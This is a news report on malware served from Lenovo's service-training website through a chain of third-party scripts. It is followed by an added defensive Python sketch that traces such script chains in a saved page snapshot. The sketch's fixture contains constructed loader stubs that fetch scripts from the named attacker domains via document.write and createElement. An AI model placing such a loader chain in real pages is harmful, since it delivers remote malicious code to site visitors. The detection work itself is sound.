Lenovo's web site for service and support-related training (www.lenovoservicetraining.com) is infected and is spreading the hackload.AD trojan. Although Lenovo was informed of the issue yesterday (Monday), the vendor appears to be having difficulty solving the problem or even officially warning its users. At least the page has now been marked as dangerous in Google's Safe Browsing API, which allows browsers such as Firefox or Chrome to block the page. The virus scanners by ESET, Kaspersky and Avast all reportedly (German language link) now detect the attack and prevent an infection from the site.

First analyses have shown that the trojan is retrieved from an external server via a link to some JavaScript code in the Lenovo page. However, it remains unclear whether the link, which leads to a marketing firm, was injected by criminals in order to act as a retrieval mechanism for the malicious code. The link could also already have existed, and the code for retrieving the malware could be finding its way onto Lenovo's web page via a hacked ad server.

The code for loading the trojan uses a multi-stage approach and tries to obscure the actual origin of the malware. The script on Lenovo's page loads a JavaScript file from avidmarketing.ie, which loads a script from chemphilic.com, which, in turn, retrieves further code from dbal.co.uk. This is Lenovo's second relatively recent infection: its driver download page had already deployed malware back in June.
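A site owner can surface this kind of chained third-party loading by tracing script includes in a saved copy of the page and its scripts. The sketch below is an added example, not code from the report: the hostnames are the ones named above, while every path, script body, the allowlist and the function name `trace_script_chains` are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed offline snapshot (URL -> body). Hostnames are the ones named in
# the article; every path and script body below is invented for illustration.
START = "http://www.lenovoservicetraining.com/"
SNAPSHOT = {
    START: '<script src="http://www.lenovoservicetraining.com/constructed/site.js"></script>'
           '<script src="http://avidmarketing.ie/constructed/a.js"></script>',
    "http://www.lenovoservicetraining.com/constructed/site.js": "var menu = 1;",
    "http://avidmarketing.ie/constructed/a.js":
        r"""document.write("<script src='http://chemphilic.com/constructed/b.js'><\/script>");""",
    "http://chemphilic.com/constructed/b.js":
        'var s = document.createElement("script");'
        's.src = "http://dbal.co.uk/constructed/c.js"; document.head.appendChild(s);',
    # The dbal.co.uk stage is deliberately absent: the chain ends at a script
    # the analyst could not capture.
}
ALLOWED = {"www.lenovoservicetraining.com"}  # assumed first-party allowlist

# Matches <script src="..."> in HTML and src assignments in script bodies.
SRC_RE = re.compile(r"""src\s*=\s*["'](https?://[^"']+)["']""")

def trace_script_chains(snapshot, start, allowed_hosts):
    """Follow script includes from `start`; return each complete host chain
    that passes through at least one host outside the allowlist."""
    findings = []

    def walk(url, chain, seen):
        chain = chain + [urlparse(url).hostname]
        nxt = [u for u in SRC_RE.findall(snapshot.get(url, "")) if u not in seen]
        for u in nxt:
            walk(u, chain, seen | {u})
        if not nxt and any(h not in allowed_hosts for h in chain):
            findings.append(chain)

    walk(start, [], {start})
    return findings

if __name__ == "__main__":
    for chain in trace_script_chains(SNAPSHOT, START, ALLOWED):
        print(" -> ".join(chain))
```

Static matching like this only finds URLs that appear literally in the saved files; a loader that assembles its URL at run time needs dynamic analysis in an isolated browser.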

See also:

Malicious code on Lenovo driver download page, a report from The H.

(crve)